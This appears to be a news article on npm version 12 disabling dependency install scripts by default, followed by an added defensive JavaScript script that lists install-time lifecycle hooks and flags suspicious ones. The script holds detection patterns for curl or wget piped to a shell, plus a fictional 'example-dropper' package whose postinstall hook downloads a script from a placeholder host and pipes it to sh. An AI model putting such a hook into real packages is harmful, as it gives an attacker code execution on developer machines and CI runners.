The Hacker News

GitHub to Disable npm Install Scripts by Default to Stop Supply Chain Attacks

GitHub has announced that npm version 12 will stop running package install scripts by default, a change aimed at blunting software supply chain attacks. The target is a well-worn technique: a malicious or compromised package declares lifecycle hooks (preinstall, install, postinstall) that "npm install" executes automatically, giving the attacker code execution on every developer machine and CI runner that pulls the dependency. Under the new default those scripts do not run unless a developer explicitly opts in, so executing a dependency's install-time code becomes a deliberate decision rather than a side effect of adding it to package.json, and the opt-in step itself makes the risk visible. The change responds to growing concern over the integrity of open-source dependencies and the ease with which a single compromised package can reach development pipelines, and it is part of GitHub's broader effort to harden the npm ecosystem and the software development lifecycle.
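Once install scripts are off by default, the practical question for a team becomes which dependencies actually declare them, because those are the packages someone will have to consciously opt back in to. The script below is an added example written for this page, not code from the article or from npm: it walks a constructed map of package.json contents (standing in for the package.json files found under node_modules or recorded in a lockfile), lists the install-time hooks each package declares, and marks commands that match a small, deliberately conservative set of "look at this by hand" patterns. The package names, versions and script bodies are made up for the example, and the regexes are a triage heuristic rather than a malware detector.

```javascript
// Added example (not from the article or from npm itself). Enumerate the
// install-time lifecycle hooks declared by each package in a dependency tree
// so a team knows exactly what it would be opting back in to.

// npm runs these hooks for dependencies during "npm install".
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Triage heuristics only: remote fetches piped into a shell, inline node
// code, or eval are worth a human look. Matching here is not proof of malice.
const SUSPICIOUS = [
  /\bcurl\b[^|]*\|\s*(sh|bash)\b/i,
  /\bwget\b[^|]*\|\s*(sh|bash)\b/i,
  /\bnode\s+-e\b/,
  /\beval\(/,
];

// Return { hookName: command } for the install-time hooks a package declares.
function installScriptsOf(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const found = {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd === "string" && cmd.trim() !== "") {
      found[hook] = cmd;
    }
  }
  return found;
}

// tree: { "name@version": <parsed package.json> }. Returns one entry per
// package that declares at least one install hook, flagged ones first.
function auditTree(tree) {
  const report = [];
  for (const [id, pkg] of Object.entries(tree)) {
    const hooks = installScriptsOf(pkg);
    if (Object.keys(hooks).length === 0) continue;
    const flagged = Object.values(hooks).some((cmd) =>
      SUSPICIOUS.some((re) => re.test(cmd))
    );
    report.push({ id, hooks, flagged });
  }
  return report.sort(
    (a, b) => Number(b.flagged) - Number(a.flagged) || a.id.localeCompare(b.id)
  );
}

// Constructed sample tree (fictional packages) for a stand-alone run.
const SAMPLE_TREE = {
  "left-pad@1.3.0": { name: "left-pad", scripts: { test: "node test.js" } },
  "native-addon@2.0.0": {
    name: "native-addon",
    scripts: { install: "node-gyp rebuild" },
  },
  "build-shim@0.19.0": {
    name: "build-shim",
    scripts: { postinstall: "node install.js" },
  },
  "example-dropper@0.1.0": {
    name: "example-dropper",
    scripts: { postinstall: "curl -s https://example.invalid/x.sh | sh" },
  },
};

for (const entry of auditTree(SAMPLE_TREE)) {
  const marker = entry.flagged ? "REVIEW" : "ok    ";
  console.log(`${marker} ${entry.id} ${JSON.stringify(entry.hooks)}`);
}
```

In the sample run, only example-dropper is marked for review; native-addon and build-shim declare hooks that look like ordinary native or download-and-build steps, but they are still the packages whose scripts will need an explicit opt-in under the new default. Today's npm already lets you approximate that default with `ignore-scripts=true` in .npmrc (or `npm install --ignore-scripts`) and then run the scripts for a package you have reviewed with `npm rebuild <package>`; the report above tells you which packages that list should contain.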

Original source: read the full reporting on The Hacker News.